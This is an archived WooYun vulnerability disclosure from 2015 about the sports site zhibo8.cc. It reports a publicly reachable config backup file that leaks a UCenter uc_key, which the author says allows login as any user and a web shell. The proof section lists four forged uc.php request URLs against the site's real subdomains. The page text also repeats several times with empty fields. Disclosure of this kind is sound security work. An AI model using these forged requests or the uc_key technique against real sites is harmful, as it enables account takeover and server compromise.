直播吧敏感信息泄漏导致任意用户登陆(153W) 可getshell

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0106661

漏洞标题：直播吧敏感信息泄漏导致任意用户登陆(153W) 可getshell

漏洞作者：撸撸侠

提交时间：2015-04-09 12:26

修复时间：2015-04-14 12:28

公开时间：2015-04-14 12:28

漏洞类型：系统/服务运维配置不当

危害等级：高

自评Rank：20

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-04-09：细节已通知厂商并且等待厂商处理中
2015-04-14：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

详细说明：

http://pl.zhibo8.cc/config.inc.php.bak

<?php
/*


mask 区域

*****', *****
*****#039;mysql5-qd01*****
*****39;, 'ne*****
*****39;, 'n*****
*****39;, 'ne*****
*****ET', *****
***** '`net445808*****
*****CT', *****
*****9;, '12*****
1.://**.**.**//zpjiaoyi.com/bbs/uc_server&
*****', *****
*****#039;, *****
*****', *****
*****039;, '*****
**********
*****>*/*****
*****', *****
*****;, '117.2*****
*****#039;, '*****
*****;, 'xlTW*****
*****E', *****
*****ET', *****
*****#039;, '`*****
*****CT', *****
*****, 'zhibo*****
2.://**.**.**//uc.zhibo8.cc&
*****', *****
*****#039;, *****
*****', *****
*****', *****





  




mask 区域

*****ó�����ݿ*****
*****39;;			// ��^*****
*****;			// ��ݿ*****
*****9;;				// �^*****
*****039;;			// ^*****
*****^����� *****
*****outai2.cdb*****




  		// ����ǰ׺, ͬһ��ݿⰲװ�����̳���޸Ĵ˴�
//ͬ����¼ Cookie ����
$cookiedomain = '.



mask 区域

*****8.c*****




'; 			// cookie ������
$cookiepath = '/';			// cookie ����·��

泄漏了uc_key 可利用uc_key登陆任意用户也可以getshell

漏洞证明：

http://bbs.zhibo8.cc/api/uc.php?time=1428491590&code=da13cog6NyIbvlQYP1%2FoIiJ6CrB%2BavReAFHsVznAHWfE6erJoaNCgHQvKkorxx%2BICHNggfWK7XAA0t3R4GMDXlntBeHzM57DHFlUupLgM2GDPdxcugRnWtdSDAggbMisaik%2BibsHYs2vdAco6LsX1A2M1LlYzxfEEDXdkEuEZg

http://pl.zhibo8.cc/api/uc.php?time=1428491590&code=ebe9AifRUnk%2BtVANsR4aYUh9uyNdtWomyggERD2qXHSzoXVnLa5OGu05Nw0wgqzZGO8f8S21TxgrMZew0%2BO6xClV5Sgwhn8pEK4iDjVOmwEFsDlpQiTkdv9ipDRlFj3EQBF4OFdhBAdH3yWuaIYZZx5gVC9ruAGt9s6nHFU7zA

http://youxi.zhibo8.com/api/uc.php?time=1428491590&code=80b350QmWN1gxVxVt4VoWmte9sAf53qWpavWTijkeO6swDDuCliyOO96cBsJpdVPrHt6K4Ksw9EoqFUp%2BF5PN2WoGfORCthpSnDN%2BNeqntgym51vmSD%2Fur7mIfL9jApnZyaW2N9PHRWhQZtOfcwZTJvFzafO3zbRQDZyS5Knug

http://daogou.zhibo8.cc/wp-content/plugins/ucenter-integration/api/uc.php?time=1428491590&code=5fbfm7%2BSHuVNeG5UlYfw2VWD1JZIjdrVed0xF%2FdcTJ1VkYIkBpcCzLG9vX208GixwhmRQKjMd7%2Ft5f4eAtePO2RUM7xdJ%2FiZRIcr2VPDGR8K%2BGir9TNUq1A97aYvnAO14cjii3FKzUcPy36aO2%2Fzb3C4ycY6lcO60twQKofJVg

修复方案：

版权声明：转载请注明来源撸撸侠@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2015-04-14 12:28

厂商回复：

漏洞Rank：12 (WooYun评价)

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0106661

漏洞标题：直播吧敏感信息泄漏导致任意用户登陆(153W) 可getshell

相关厂商：zhibo8.cc

漏洞作者：撸撸侠

提交时间：2015-04-09 12:26

修复时间：2015-04-14 12:28

公开时间：2015-04-14 12:28

漏洞类型：系统/服务运维配置不当

危害等级：高

自评Rank：20

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源撸撸侠@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0106661

漏洞标题：直播吧敏感信息泄漏导致任意用户登陆(153W) 可getshell

相关厂商：zhibo8.cc

漏洞作者： 撸撸侠

提交时间：2015-04-09 12:26

修复时间：2015-04-14 12:28

公开时间：2015-04-14 12:28

漏洞类型：系统/服务运维配置不当

危害等级：高

自评Rank：20

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0106661"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 撸撸侠@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：撸撸侠

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源撸撸侠@乌云